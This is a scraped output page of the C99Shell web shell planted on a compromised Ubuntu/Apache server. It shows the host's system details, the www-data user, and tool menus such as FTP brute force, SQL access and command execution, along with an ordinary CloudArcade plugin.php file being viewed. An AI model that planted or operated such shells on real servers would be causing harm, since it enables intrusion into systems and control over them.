!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/gamesdaddy/cloudarcade/includes/   drwxr-xr-x
Free 13.22 GB of 57.97 GB (22.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     plugin.php (1.35 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

defined
('ABSPATH') or die('abcd');

define('PLUGIN_PATH''content/plugins/');

$plugin_list get_plugin_list();
//print_r($plugin_list);
function get_plugin_list(){
    
$list = [];
    
$dirs scan_folderPLUGIN_PATH );
    foreach (
$dirs as $dir) {
        
$info get_plugin_info($dir);
        if(
$info){
            
array_push($list$info);
        }
    }
    return 
$list;
}

function 
get_plugin_info($name){
    
$plugin_dir ABSPATH PLUGIN_PATH $name;
    
$json_path $plugin_dir '/info.json';

    if(
file_exists($json_path)){
        
$array json_decode(file_get_contents($json_path), true);
        if(isset(
$array['name']) && isset($array['version']) && isset($array['author']) && isset($array['description']) && isset($array['require_version']) && isset($array['tested_version']) && isset($array['type']) && isset($array['target'])){
            
$array['path'] = $plugin_dir;
            
$array['dir_name'] = $name;
            return 
$array;
        }
        return 
false;
    }
    return 
false;
}

function 
is_plugin_exist($name){
    global 
$plugin_list;

    foreach (
$plugin_list as $plugin) {
        if(
$plugin['dir_name'] == $name){
            return 
true;
        }
    }
}

function 
load_plugins($type){
    global 
$plugin_list;
    
    foreach (
$plugin_list as $plugin) {
        if(
$plugin['target'] == $type){
            if(
substr($plugin['dir_name'], 01) != '_'){
                require_once( 
$plugin['path'].'/main.php' );
            }
        }
    }
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]--